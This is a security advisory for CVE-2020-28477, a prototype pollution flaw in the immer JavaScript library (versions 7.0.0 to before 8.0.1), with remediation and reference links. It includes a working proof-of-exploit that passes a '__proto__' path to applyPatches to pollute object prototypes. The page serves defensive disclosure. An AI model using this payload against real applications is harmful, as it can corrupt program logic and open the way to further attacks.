CVE-2020-28477

Description

## Overview Affected versions of immer are vulnerable to Prototype Pollution. ## Proof of exploit ```js const {applyPatches, enablePatches} = require("immer"); enablePatches(); let obj = {}; console.log("Before : " + obj.polluted); applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]); // applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]); console.log("After : " + obj.polluted); ``` ## Remediation Version 8.0.1 contains a [fix](https://github.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5) for this vulnerability, updating is recommended.

How to fix CVE-2020-28477

To remediate CVE-2020-28477, upgrade the affected package to a fixed version below.

• —upgrade to 8.0.1 or later

Is CVE-2020-28477 being exploited?

Low — EPSS is 0.3%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• >= 7.0.0, < 8.0.1

CVSS scores

References (7)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2020-28477
• WEBgithub.com/immerjs/immer/blob/master/src/plugins/patches.ts%23L213
• WEBgithub.com/immerjs/immer/commit/da2bd4fa0edc9335543089fe7d290d6a346c40c5
• WEBgithub.com/immerjs/immer/issues/738